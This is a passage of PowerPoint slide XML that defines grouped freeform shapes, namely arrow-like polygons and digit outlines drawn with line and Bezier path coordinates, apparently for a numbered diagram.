                  <a:gd name="T8" fmla="*/ 0 w 705"/>
                  <a:gd name="T9" fmla="*/ 202 h 406"/>
                  <a:gd name="T10" fmla="*/ 260 w 705"/>
                  <a:gd name="T11" fmla="*/ 406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5" h="406">
                    <a:moveTo>
                      <a:pt x="260" y="406"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="488" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="705" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="406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" name="Freeform 12"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4488343" y="3600139"/>
                <a:ext cx="917252" cy="504141"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 655 w 655"/>
                  <a:gd name="T1" fmla="*/ 0 h 360"/>
                  <a:gd name="T2" fmla="*/ 230 w 655"/>
                  <a:gd name="T3" fmla="*/ 0 h 360"/>
                  <a:gd name="T4" fmla="*/ 0 w 655"/>
                  <a:gd name="T5" fmla="*/ 179 h 360"/>
                  <a:gd name="T6" fmla="*/ 230 w 655"/>
                  <a:gd name="T7" fmla="*/ 360 h 360"/>
                  <a:gd name="T8" fmla="*/ 462 w 655"/>
                  <a:gd name="T9" fmla="*/ 360 h 360"/>
                  <a:gd name="T10" fmla="*/ 655 w 655"/>
                  <a:gd name="T11" fmla="*/ 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5" h="360">
                    <a:moveTo>
                      <a:pt x="655" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="230" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655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" name="Freeform 41"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4778222" y="3710770"/>
                <a:ext cx="141439" cy="246469"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 111 w 111"/>
                  <a:gd name="T1" fmla="*/ 117 h 194"/>
                  <a:gd name="T2" fmla="*/ 96 w 111"/>
                  <a:gd name="T3" fmla="*/ 175 h 194"/>
                  <a:gd name="T4" fmla="*/ 56 w 111"/>
                  <a:gd name="T5" fmla="*/ 194 h 194"/>
                  <a:gd name="T6" fmla="*/ 15 w 111"/>
                  <a:gd name="T7" fmla="*/ 175 h 194"/>
                  <a:gd name="T8" fmla="*/ 0 w 111"/>
                  <a:gd name="T9" fmla="*/ 117 h 194"/>
                  <a:gd name="T10" fmla="*/ 0 w 111"/>
                  <a:gd name="T11" fmla="*/ 77 h 194"/>
                  <a:gd name="T12" fmla="*/ 15 w 111"/>
                  <a:gd name="T13" fmla="*/ 19 h 194"/>
                  <a:gd name="T14" fmla="*/ 55 w 111"/>
                  <a:gd name="T15" fmla="*/ 0 h 194"/>
                  <a:gd name="T16" fmla="*/ 96 w 111"/>
                  <a:gd name="T17" fmla="*/ 19 h 194"/>
                  <a:gd name="T18" fmla="*/ 111 w 111"/>
                  <a:gd name="T19" fmla="*/ 77 h 194"/>
                  <a:gd name="T20" fmla="*/ 111 w 111"/>
                  <a:gd name="T21" fmla="*/ 117 h 194"/>
                  <a:gd name="T22" fmla="*/ 74 w 111"/>
                  <a:gd name="T23" fmla="*/ 73 h 194"/>
                  <a:gd name="T24" fmla="*/ 69 w 111"/>
                  <a:gd name="T25" fmla="*/ 40 h 194"/>
                  <a:gd name="T26" fmla="*/ 56 w 111"/>
                  <a:gd name="T27" fmla="*/ 30 h 194"/>
                  <a:gd name="T28" fmla="*/ 55 w 111"/>
                  <a:gd name="T29" fmla="*/ 30 h 194"/>
                  <a:gd name="T30" fmla="*/ 42 w 111"/>
                  <a:gd name="T31" fmla="*/ 40 h 194"/>
                  <a:gd name="T32" fmla="*/ 37 w 111"/>
                  <a:gd name="T33" fmla="*/ 73 h 194"/>
                  <a:gd name="T34" fmla="*/ 37 w 111"/>
                  <a:gd name="T35" fmla="*/ 120 h 194"/>
                  <a:gd name="T36" fmla="*/ 42 w 111"/>
                  <a:gd name="T37" fmla="*/ 154 h 194"/>
                  <a:gd name="T38" fmla="*/ 55 w 111"/>
                  <a:gd name="T39" fmla="*/ 164 h 194"/>
                  <a:gd name="T40" fmla="*/ 56 w 111"/>
                  <a:gd name="T41" fmla="*/ 164 h 194"/>
                  <a:gd name="T42" fmla="*/ 69 w 111"/>
                  <a:gd name="T43" fmla="*/ 154 h 194"/>
                  <a:gd name="T44" fmla="*/ 74 w 111"/>
                  <a:gd name="T45" fmla="*/ 120 h 194"/>
                  <a:gd name="T46" fmla="*/ 74 w 111"/>
                  <a:gd name="T47" fmla="*/ 73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1" h="194">
                    <a:moveTo>
                      <a:pt x="111" y="117"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="111" y="142"/>
                      <a:pt x="106" y="162"/>
                      <a:pt x="96" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="188"/>
                      <a:pt x="72" y="194"/>
                      <a:pt x="56" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="194"/>
                      <a:pt x="25" y="188"/>
                      <a:pt x="15" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="0" y="142"/>
                      <a:pt x="0" y="11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52"/>
                      <a:pt x="5" y="32"/>
                      <a:pt x="15" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="6"/>
                      <a:pt x="39" y="0"/>
                      <a:pt x="55" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="0"/>
                      <a:pt x="86" y="6"/>
                      <a:pt x="96" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="32"/>
                      <a:pt x="111" y="52"/>
                      <a:pt x="111" y="77"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="111" y="117"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="74" y="73"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="58"/>
                      <a:pt x="72" y="47"/>
                      <a:pt x="69" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="33"/>
                      <a:pt x="61" y="30"/>
                      <a:pt x="56" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="30"/>
                      <a:pt x="55" y="30"/>
                      <a:pt x="55" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="30"/>
                      <a:pt x="45" y="33"/>
                      <a:pt x="42" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="47"/>
                      <a:pt x="37" y="58"/>
                      <a:pt x="37" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="120"/>
                      <a:pt x="37" y="120"/>
                      <a:pt x="37" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="136"/>
                      <a:pt x="39" y="147"/>
                      <a:pt x="42" y="154"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="161"/>
                      <a:pt x="49" y="164"/>
                      <a:pt x="55" y="164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62" y="164"/>
                      <a:pt x="66" y="161"/>
                      <a:pt x="69" y="154"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="147"/>
                      <a:pt x="74" y="136"/>
                      <a:pt x="74" y="120"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="74" y="7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ckwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="159" name="Freeform 42"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4940667" y="3710770"/>
                <a:ext cx="145640" cy="246469"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 37 w 115"/>
                  <a:gd name="T1" fmla="*/ 81 h 194"/>
                  <a:gd name="T2" fmla="*/ 56 w 115"/>
                  <a:gd name="T3" fmla="*/ 81 h 194"/>
                  <a:gd name="T4" fmla="*/ 71 w 115"/>
                  <a:gd name="T5" fmla="*/ 74 h 194"/>
                  <a:gd name="T6" fmla="*/ 75 w 115"/>
                  <a:gd name="T7" fmla="*/ 54 h 194"/>
                  <a:gd name="T8" fmla="*/ 71 w 115"/>
                  <a:gd name="T9" fmla="*/ 36 h 194"/>
                  <a:gd name="T10" fmla="*/ 57 w 115"/>
                  <a:gd name="T11" fmla="*/ 29 h 194"/>
                  <a:gd name="T12" fmla="*/ 44 w 115"/>
                  <a:gd name="T13" fmla="*/ 35 h 194"/>
                  <a:gd name="T14" fmla="*/ 39 w 115"/>
                  <a:gd name="T15" fmla="*/ 51 h 194"/>
                  <a:gd name="T16" fmla="*/ 3 w 115"/>
                  <a:gd name="T17" fmla="*/ 51 h 194"/>
                  <a:gd name="T18" fmla="*/ 3 w 115"/>
                  <a:gd name="T19" fmla="*/ 50 h 194"/>
                  <a:gd name="T20" fmla="*/ 18 w 115"/>
                  <a:gd name="T21" fmla="*/ 14 h 194"/>
                  <a:gd name="T22" fmla="*/ 56 w 115"/>
                  <a:gd name="T23" fmla="*/ 0 h 194"/>
                  <a:gd name="T24" fmla="*/ 97 w 115"/>
                  <a:gd name="T25" fmla="*/ 14 h 194"/>
                  <a:gd name="T26" fmla="*/ 112 w 115"/>
                  <a:gd name="T27" fmla="*/ 54 h 194"/>
                  <a:gd name="T28" fmla="*/ 106 w 115"/>
                  <a:gd name="T29" fmla="*/ 77 h 194"/>
                  <a:gd name="T30" fmla="*/ 87 w 115"/>
                  <a:gd name="T31" fmla="*/ 94 h 194"/>
                  <a:gd name="T32" fmla="*/ 108 w 115"/>
                  <a:gd name="T33" fmla="*/ 111 h 194"/>
                  <a:gd name="T34" fmla="*/ 115 w 115"/>
                  <a:gd name="T35" fmla="*/ 139 h 194"/>
                  <a:gd name="T36" fmla="*/ 98 w 115"/>
                  <a:gd name="T37" fmla="*/ 179 h 194"/>
                  <a:gd name="T38" fmla="*/ 56 w 115"/>
                  <a:gd name="T39" fmla="*/ 194 h 194"/>
                  <a:gd name="T40" fmla="*/ 17 w 115"/>
                  <a:gd name="T41" fmla="*/ 180 h 194"/>
                  <a:gd name="T42" fmla="*/ 1 w 115"/>
                  <a:gd name="T43" fmla="*/ 140 h 194"/>
                  <a:gd name="T44" fmla="*/ 1 w 115"/>
                  <a:gd name="T45" fmla="*/ 139 h 194"/>
                  <a:gd name="T46" fmla="*/ 37 w 115"/>
                  <a:gd name="T47" fmla="*/ 139 h 194"/>
                  <a:gd name="T48" fmla="*/ 43 w 115"/>
                  <a:gd name="T49" fmla="*/ 157 h 194"/>
                  <a:gd name="T50" fmla="*/ 57 w 115"/>
                  <a:gd name="T51" fmla="*/ 165 h 194"/>
                  <a:gd name="T52" fmla="*/ 72 w 115"/>
                  <a:gd name="T53" fmla="*/ 157 h 194"/>
                  <a:gd name="T54" fmla="*/ 78 w 115"/>
                  <a:gd name="T55" fmla="*/ 138 h 194"/>
                  <a:gd name="T56" fmla="*/ 72 w 115"/>
                  <a:gd name="T57" fmla="*/ 116 h 194"/>
                  <a:gd name="T58" fmla="*/ 56 w 115"/>
                  <a:gd name="T59" fmla="*/ 109 h 194"/>
                  <a:gd name="T60" fmla="*/ 37 w 115"/>
                  <a:gd name="T61" fmla="*/ 109 h 194"/>
                  <a:gd name="T62" fmla="*/ 37 w 115"/>
                  <a:gd name="T63" fmla="*/ 81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5" h="194">
                    <a:moveTo>
                      <a:pt x="37" y="81"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="81"/>
                      <a:pt x="56" y="81"/>
                      <a:pt x="56" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="81"/>
                      <a:pt x="67" y="78"/>
                      <a:pt x="71" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="69"/>
                      <a:pt x="75" y="62"/>
                      <a:pt x="75" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="47"/>
                      <a:pt x="74" y="41"/>
                      <a:pt x="71" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="31"/>
                      <a:pt x="63" y="29"/>
                      <a:pt x="57" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="29"/>
                      <a:pt x="48" y="31"/>
                      <a:pt x="44" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="39"/>
                      <a:pt x="39" y="45"/>
                      <a:pt x="39" y="51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3" y="36"/>
                      <a:pt x="8" y="23"/>
                      <a:pt x="18" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="4"/>
                      <a:pt x="41" y="0"/>
                      <a:pt x="56" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="0"/>
                      <a:pt x="87" y="4"/>
                      <a:pt x="97" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="23"/>
                      <a:pt x="112" y="36"/>
                      <a:pt x="112" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="112" y="62"/>
                      <a:pt x="110" y="70"/>
                      <a:pt x="106" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="85"/>
                      <a:pt x="95" y="90"/>
                      <a:pt x="87" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="98"/>
                      <a:pt x="103" y="104"/>
                      <a:pt x="108" y="111"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="112" y="119"/>
                      <a:pt x="115" y="128"/>
                      <a:pt x="115" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="156"/>
                      <a:pt x="109" y="169"/>
                      <a:pt x="98" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="189"/>
                      <a:pt x="73" y="194"/>
                      <a:pt x="56" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="194"/>
                      <a:pt x="27" y="189"/>
                      <a:pt x="17" y="180"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="171"/>
                      <a:pt x="0" y="158"/>
                      <a:pt x="1" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="139"/>
                      <a:pt x="1" y="139"/>
                      <a:pt x="1" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="139"/>
                      <a:pt x="37" y="139"/>
                      <a:pt x="37" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="147"/>
                      <a:pt x="39" y="153"/>
                      <a:pt x="43" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="162"/>
                      <a:pt x="51" y="165"/>
                      <a:pt x="57" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="165"/>
                      <a:pt x="68" y="162"/>
                      <a:pt x="72" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="153"/>
                      <a:pt x="78" y="146"/>
                      <a:pt x="78" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="128"/>
                      <a:pt x="76" y="121"/>
                      <a:pt x="72" y="116"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="112"/>
                      <a:pt x="63" y="109"/>
                      <a:pt x="56" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="109"/>
                      <a:pt x="37" y="109"/>
                      <a:pt x="37" y="109"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="37" y="8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ckwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="114" name="Group 113"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6689747" y="2796314"/>
              <a:ext cx="960664" cy="592366"/>
              <a:chOff x="6689747" y="2796314"/>
              <a:chExt cx="960664" cy="592366"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="154" name="Freeform 7"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6689747" y="2796314"/>
                <a:ext cx="960664" cy="592366"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 427 w 686"/>
                  <a:gd name="T1" fmla="*/ 423 h 423"/>
                  <a:gd name="T2" fmla="*/ 218 w 686"/>
                  <a:gd name="T3" fmla="*/ 423 h 423"/>
                  <a:gd name="T4" fmla="*/ 0 w 686"/>
                  <a:gd name="T5" fmla="*/ 0 h 423"/>
                  <a:gd name="T6" fmla="*/ 427 w 686"/>
                  <a:gd name="T7" fmla="*/ 0 h 423"/>
                  <a:gd name="T8" fmla="*/ 686 w 686"/>
                  <a:gd name="T9" fmla="*/ 210 h 423"/>
                  <a:gd name="T10" fmla="*/ 427 w 686"/>
                  <a:gd name="T11" fmla="*/ 423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86" h="423">
                    <a:moveTo>
                      <a:pt x="427" y="423"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="218" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="686" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="423"/>
                    </a:ln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" name="Freeform 8"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6706552" y="2829923"/>
                <a:ext cx="890645" cy="523747"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 636"/>
                  <a:gd name="T1" fmla="*/ 0 h 374"/>
                  <a:gd name="T2" fmla="*/ 407 w 636"/>
                  <a:gd name="T3" fmla="*/ 0 h 374"/>
                  <a:gd name="T4" fmla="*/ 636 w 636"/>
                  <a:gd name="T5" fmla="*/ 186 h 374"/>
                  <a:gd name="T6" fmla="*/ 407 w 636"/>
                  <a:gd name="T7" fmla="*/ 374 h 374"/>
                  <a:gd name="T8" fmla="*/ 192 w 636"/>
                  <a:gd name="T9" fmla="*/ 374 h 374"/>
                  <a:gd name="T10" fmla="*/ 0 w 636"/>
                  <a:gd name="T11" fmla="*/ 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36" h="374">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="407" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="3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ckwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="115" name="Group 114"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5149324" y="2014895"/>
              <a:ext cx="1054490" cy="642780"/>
              <a:chOff x="5149324" y="2014895"/>
              <a:chExt cx="1054490" cy="642780"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="152" name="Freeform 5"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5149324" y="2014895"/>
                <a:ext cx="1054490" cy="642780"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 278 w 753"/>
                  <a:gd name="T1" fmla="*/ 459 h 459"/>
                  <a:gd name="T2" fmla="*/ 475 w 753"/>
                  <a:gd name="T3" fmla="*/ 459 h 459"/>
                  <a:gd name="T4" fmla="*/ 753 w 753"/>
                  <a:gd name="T5" fmla="*/ 0 h 459"/>
                  <a:gd name="T6" fmla="*/ 278 w 753"/>
                  <a:gd name="T7" fmla="*/ 0 h 459"/>
                  <a:gd name="T8" fmla="*/ 0 w 753"/>
                  <a:gd name="T9" fmla="*/ 214 h 459"/>
                  <a:gd name="T10" fmla="*/ 278 w 753"/>
                  <a:gd name="T11" fmla="*/ 459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3" h="459">
                    <a:moveTo>
                      <a:pt x="278" y="459"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="475" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="753" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="459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" name="Freeform 6"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5199738" y="2044303"/>
                <a:ext cx="985871" cy="585364"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 252 w 704"/>
                  <a:gd name="T1" fmla="*/ 418 h 418"/>
                  <a:gd name="T2" fmla="*/ 0 w 704"/>
                  <a:gd name="T3" fmla="*/ 194 h 418"/>
                  <a:gd name="T4" fmla="*/ 251 w 704"/>
                  <a:gd name="T5" fmla="*/ 0 h 418"/>
                  <a:gd name="T6" fmla="*/ 704 w 704"/>
                  <a:gd name="T7" fmla="*/ 0 h 418"/>
                  <a:gd name="T8" fmla="*/ 452 w 704"/>
                  <a:gd name="T9" fmla="*/ 418 h 418"/>
                  <a:gd name="T10" fmla="*/ 252 w 704"/>
                  <a:gd name="T11" fmla="*/ 418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4" h="418">
                    <a:moveTo>
                      <a:pt x="252" y="418"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="418"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="418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16" name="Group 115"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7441754" y="4331144"/>
              <a:ext cx="1013878" cy="614772"/>
              <a:chOff x="7441754" y="4331144"/>
              <a:chExt cx="1013878" cy="614772"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="150" name="Freeform 9"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7441754" y="4331144"/>
                <a:ext cx="1013878" cy="614772"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 465 w 724"/>
                  <a:gd name="T1" fmla="*/ 438 h 439"/>
                  <a:gd name="T2" fmla="*/ 218 w 724"/>
                  <a:gd name="T3" fmla="*/ 439 h 439"/>
                  <a:gd name="T4" fmla="*/ 0 w 724"/>
                  <a:gd name="T5" fmla="*/ 0 h 439"/>
                  <a:gd name="T6" fmla="*/ 465 w 724"/>
                  <a:gd name="T7" fmla="*/ 0 h 439"/>
                  <a:gd name="T8" fmla="*/ 724 w 724"/>
                  <a:gd name="T9" fmla="*/ 217 h 439"/>
                  <a:gd name="T10" fmla="*/ 465 w 724"/>
                  <a:gd name="T11" fmla="*/ 438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4" h="439">
                    <a:moveTo>
                      <a:pt x="465" y="438"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="218" y="439"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="438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" name="Freeform 10"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7459959" y="4366153"/>
                <a:ext cx="942459" cy="543352"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 673"/>
                  <a:gd name="T1" fmla="*/ 0 h 388"/>
                  <a:gd name="T2" fmla="*/ 444 w 673"/>
                  <a:gd name="T3" fmla="*/ 0 h 388"/>
                  <a:gd name="T4" fmla="*/ 673 w 673"/>
                  <a:gd name="T5" fmla="*/ 193 h 388"/>
                  <a:gd name="T6" fmla="*/ 444 w 673"/>
                  <a:gd name="T7" fmla="*/ 388 h 388"/>
                  <a:gd name="T8" fmla="*/ 192 w 673"/>
                  <a:gd name="T9" fmla="*/ 388 h 388"/>
                  <a:gd name="T10" fmla="*/ 0 w 673"/>
                  <a:gd name="T11" fmla="*/ 0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3" h="388">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="444" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="673" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="444" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="3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ckwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="117" name="Group 116"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4429526" y="2014895"/>
              <a:ext cx="3753031" cy="4082143"/>
              <a:chOff x="4429526" y="2014895"/>
              <a:chExt cx="3753031" cy="4082143"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="126" name="Freeform 15"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5814507" y="2014895"/>
                <a:ext cx="389307" cy="642780"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 201 w 278"/>
                  <a:gd name="T1" fmla="*/ 420 h 459"/>
                  <a:gd name="T2" fmla="*/ 278 w 278"/>
                  <a:gd name="T3" fmla="*/ 0 h 459"/>
                  <a:gd name="T4" fmla="*/ 0 w 278"/>
                  <a:gd name="T5" fmla="*/ 459 h 459"/>
                  <a:gd name="T6" fmla="*/ 201 w 278"/>
                  <a:gd name="T7" fmla="*/ 420 h 459"/>
                  <a:gd name="T8" fmla="*/ 201 w 278"/>
                  <a:gd name="T9" fmla="*/ 420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8" h="459">
                    <a:moveTo>
                      <a:pt x="201" y="420"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="278" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
